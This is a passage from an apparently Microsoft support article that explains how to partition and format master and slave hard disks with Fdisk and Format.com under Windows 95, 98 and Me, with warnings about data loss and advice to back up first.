NOTE: If you are using a Windows 95 Startup disk, a command prompt is displayed and you can skip to step 2. If you are using a Windows 98, Windows 98 Second Edition, or Windows Me Startup disk, select the Start computer without CD-ROM support menu option when the Windows 98 Startup menu is displayed.
2. When a command prompt is displayed, type format c: /s, and then press ENTER. This command transfers the system files and should only be used when you format drive C (or your "active" drive). For all other partitions, type format drive: (where drive is the letter of the partition that you want to format).
NOTE: If you receive a "Bad command" or "Bad file name" error message, you may need to extract the Format.com tool to your boot disk. To do this, type the following command at a command prompt, and then press ENTER:
extract ebd.cab format.com
After the Format.com tool is extracted to your boot disk, type format c: /s at a command prompt to format your active partition, or type format drive: if you want to format a partition that is not your active partition.
3. When you successfully run the Format.com tool, you receive the following message:
WARNING, ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST!
Proceed with Format?
4. Press Y, and then press ENTER to format drive C.
5. After the format procedure is finished, you receive the following message:
Volume label (11 characters, ENTER for none)?
NOTE: This is an optional feature that you can use to type a name for the drive. You can either type an 11-character name for the drive, or you can leave it blank by pressing ENTER.
For information about how to repartition the extended partition and logical drives, view the "How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk" section in this article.
How to Repartition and Format a Slave Hard Disk
If you want to add a second hard disk (slave drive) to your computer, you need to make sure that the jumpers on both the master (original) and slave (new drive) are set according to the manufacturer's instructions first so that your computer can detect the hard disks. Verify that your hardware is installed correctly, and then follow these steps:
1. Click Start, point to Run, and then type command (Note that the cmd command only works on Windows 2000-based computers).
2. At a command prompt, type fdisk, and then press ENTER. The following menu is displayed:
   1. Create DOS partition or Logical DOS Drive
   2. Set active partition
   3. Delete partition or Logical DOS Drive
   4. Display partition information
   5. Change current fixed disk drive
Note that menu option 5 is available only if you have two physical hard disks on your computer.
3. Press 5, and then press ENTER. When you do this, the selection changes from the physical disk 1 (master) to the physical disk 2 (slave).
4. Press 1 to select the Create DOS partition or Logical DOS Drive menu option, press ENTER, press 2 to select the Create Extended DOS Partition menu option, and then press ENTER. When you make your slave drive an extended MS-DOS partition, your drive letters do not change. For example, if the first drive contains partition C and partition D, your slave drive becomes D unless you set the slave drive as an extended partition. If you skip this step and just create another primary MS-DOS partition for the slave drive, the new drive becomes drive D and what used to be drive D changes to drive E.
5. You can partition the slave drive to make other logical drives just as you did with the original master drive. If your computer cannot detect the new drive, you may need to add the following line to your Config.sys file, where drive is a letter that is greater than the last drive letter on the computer (including the CD-ROM drive):
lastdrive=drive
6. After you finish using the Fdisk tool, format the new partitions so that you can use them. After you press ESC to quit the Fdisk tool, restart your computer to start Windows.
How to Format a Slave Hard Disk
To format your new partition or partitions, use one of the following methods, depending on your file system. For a FAT16 file system:
a. Double-click My Computer, right-click the partition that you just created, click Format, click Full, and then click Start.
b. After the format procedure is complete, click OK to close the dialog box.
For a FAT32 file system:
a. Click Start, point to Programs, point to Accessories, point to System Tools, click Drive Converter (FAT32), and then click Next.
b. In the Drives box, click the drive that you want to convert to the FAT32 file system.
c. Click Next, and then click OK.
d. Click Next, click Next, and then click Next again.
e. When the conversion procedure is finished, click Finish.
NOTE: Do not use the /s switch that you used when you set up drive C. All you need to do is to format the drive or drives so that you can use them (for example, if you created two new drive letters, you need to format both drives).
For information about how to repartition the extended partition and logical drives, view the following "How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk" section in this article.
How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk
Use the steps in this section to resize or combine your extended partition and logical drives. Make sure that you have a reliable backup of any important data that you have on your extended partition and logical drives before you proceed. If you want to combine your entire hard disk in one partition, use the steps in the "How to Partition and Format a Master Hard Disk" section in this article.
How to Repartition the Extended Partition and the Logical Drives
NOTE: When you use this method, two or more partitions are left on your hard disk, a primary partition (usually drive C) and an extended partition. Even if you use the FAT32 file system, there is an 8-GB partition limitation unless you obtain a BIOS upgrade that fully supports interrupt 13 extensions. For additional information about why there is an 8-GB limit, click the article number below to view the article in the Microsoft Knowledge Base:
153550 (http://support.microsoft.com/kb/153550/EN-US/ ) Hard Disk Limited to 8-GB Partition
If you have a hard disk that is larger than 8 GB and you are not using a disk overlay program or disk management software, you need to partition and format the space that is remaining after you create each 8-GB partition:
1. Place the Startup disk in your floppy disk drive, restart your computer, and then use one of the following methods, depending on your operating system. For a Windows 98, Windows 98 Second Edition, or Windows Me Startup disk:
a. When the Microsoft Windows 98 Startup menu is displayed, select the Start computer without CD-ROM support menu option, and then press ENTER.
b. At a command prompt, type fdisk, and then press ENTER.
c. Go to step 2.
For a Windows 95 Startup disk:
d. At a command prompt, type fdisk, and then press ENTER.
e. Go to step 2.
If your hard disk is larger than 512 MB, you receive the following message:
Your computer has a disk larger than 512 MB. This version of Windows includes improved support for large disks, resulting in more efficient use of disk space on large drives, and allowing disks over 2 GB to be formatted as a single drive.
IMPORTANT: If you enable large disk support and create any new drives on this disk, you will not be able to access the new drive(s) using other operating systems, including some versions of Windows 95 and Windows NT, as well as earlier versions of Windows and MS-DOS. In addition, disk utilities that were not designated explicitly for the FAT32 file system will not be able to work with this disk. If you need to access this disk with other operating systems or older disk utilities, do not enable large drive support.
Do you wish to enable large disk support (Y/N)?
If you want to use the FAT32 file system, press Y and then press ENTER. If you want to use the FAT16 file system, press N, and then press ENTER. For additional information about the FAT32 and FAT16 file systems, click the article numbers below to view the articles in the Microsoft Knowledge Base:
118335 (http://support.microsoft.com/kb/118335/EN-US/ ) Maximum Partition Size Using FAT16 File System
154997 (http://support.microsoft.com/kb/154997/EN-US/ ) Description of the FAT32 File System
After you press ENTER, the following Fdisk Options menu is displayed:
1. Create DOS partition or Logical DOS Drive
2. Set active partition
3. Delete partition or Logical DOS Drive
4. Display partition information
5. Change current fixed disk drive
(this option is only available if you
have two physical hard disks in the computer)
Press 3, and then press ENTER. The following menu is displayed:
1. Delete Primary DOS Partition
2. Delete Extended DOS Partition
3. Delete Logical DOS Drive(s) in the Extended DOS Partition
4. Delete Non-DOS Partition
Press 3, and then press ENTER.
The Delete Logical DOS Drive(s) in the Extended DOS Partition screen is displayed with a chart that describes the attributes of your hard disk, as shown in the following example.
Drv  Volume Label    Mbytes  System   Usage
D:   (User Defined)  2047    FAT16    100%
E:   (User Defined)  2047    FAT16    100%
F:   (User Defined)  2047    FAT16    100%
G:   (User Defined)  2047    FAT16    100%
H:   (User Defined)  2047    FAT32    17%
I:   (User Defined)  1498    UNKNOWN  13%
Total Extended DOS Partition size is XXX Mbytes (1 MByte = 1048576 bytes).
WARNING! Data in a deleted Logical DOS Drive will be lost.
What drive do you want to delete? Type the letter for the drive that you want to delete, and then press ENTER.
When you are prompted to type the volume label for the drive, type the volume label if the drive has a volume label.
NOTE: You must type the exact label or press ENTER if there is no volume label. If you type an incorrect label name, you receive the following message:
Volume label does not match.
Enter Volume Label?
If you type the correct volume label, you receive the following message:
Are you sure (Y/N)?
The default answer to this message is N. You must press Y, and then press ENTER to delete the drive. The words "Drive deleted" are displayed in the chart next to the drive letter that you deleted.
Repeat steps 3 through 7 until you have deleted all of the drives that you want to delete. When you are finished, press ESC. If you remove all of the logical drives, you receive a "No logical drives defined" message and a chart of drive letters that you changed or deleted. Press ESC to continue.
NOTE: If you want to resize the logical drive or drives by making them larger or smaller, do this now. If you want to remove the extended partition, view step 11.
Press 1 to select the Create DOS partition or Logical DOS Drive menu option from the Fdisk Options menu, press 3 to select the Create Logical DOS Drive(s) in the Extended DOS Partition menu option from the Create DOS Partition or Logical DOS Drive menu, and then press ENTER. When you do this, you receive a "Verifying drive integrity" message with a percentage-complete counter.
NOTE: When you use this step, the extended partition is not deleted, only the logical drive or drives in the extended partition are deleted. You do not need to remove the extended partition to resize the logical drives. For example, if you have one logical drive in the extended partition and you want to make two logical drives, delete the logical drive and create two logical drives in the extended partition first. Note that you are still limited to the total space in the extended partition.
After the drive verification procedure is finished, you receive the following message:
Total Extended DOS Partition size is XXX Mbytes (1 MByte = 1048576 bytes)
Maximum space available for logical drive is XXX Mbytes (X%)
Enter logical drive size in Mbytes or percent of disk space (%).
The "maximum Mbytes available" is the default size; however, you can change the number by typing the number for the partition size that you want to create, and then pressing ENTER. Press ESC, press ESC to quit the Fdisk tool and return to a command prompt, and then view step 11.
If you want to remove the extended MS-DOS partition, press ESC to return to the Fdisk Options menu. Press 3 to select the Delete DOS Partition or Logical DOS Drive menu option, press ENTER, press 2 to select the Delete Extended DOS Partition menu option, and then press ENTER.
The screen shows the current fixed disk drive and information about it. The extended partition is listed in the Type column. For example:
Partition  Status  Type     Volume Label  Mbytes  System   Usage
C: 1       A       PRI DOS  (your label)  1200    FAT16    50%
   2               EXT DOS  (your label)  1200    UNKNOWN  50%
Total disk space is 2400 Mbytes (1 Mbyte = 1048576 bytes)
You also receive the following warning message:
WARNING! Data in the deleted Extended DOS Partition will be lost.
Do you wish to continue (Y/N)?
Press Y, and then press ENTER to delete the partition. You receive the following message:
Extended DOS Partition deleted
Press ESC to continue
NOTE: If you try to delete your extended MS-DOS partition before you remove all of the logical drives, you receive the following error message:
Cannot delete Extended DOS Partition while logical drives exist.
If you receive this error message, repeat steps 3 through 6, and then follow steps 9 and 10 to delete the extended MS-DOS partition.
The Fdisk Options menu is displayed. If you leave disk space unpartitioned on your hard disk, Windows may not display the full size of your hard disk, only the amount of space that is available.
IMPORTANT: After you change the Fdisk options or delete partitions, the data that was on the partition is deleted and cannot be retrieved. Be very sure that you understand this procedure before you attempt to follow it. If you want to start with a clean configuration or if you want to redo your current configuration, back up everything that is important to you before you use the Fdisk tool.
If you want to use the unpartitioned space on your hard disk, you must format the drives. When you successfully run the Format.com utility, you receive the following message:
WARNING, ALL DATA ON NON-REMOVABLE DISK DRIVE X: WILL BE LOST!
Proceed with Format (Y/N)?
Press Y, and then press ENTER to format the drive.
After the format procedure is finished, you receive the following message:
Volume label (11 characters, ENTER for none)?
NOTE: This is an optional feature that you can use to type a name for the hard disk. You can either type an 11-character name for the drive, or leave it blank and press ENTER.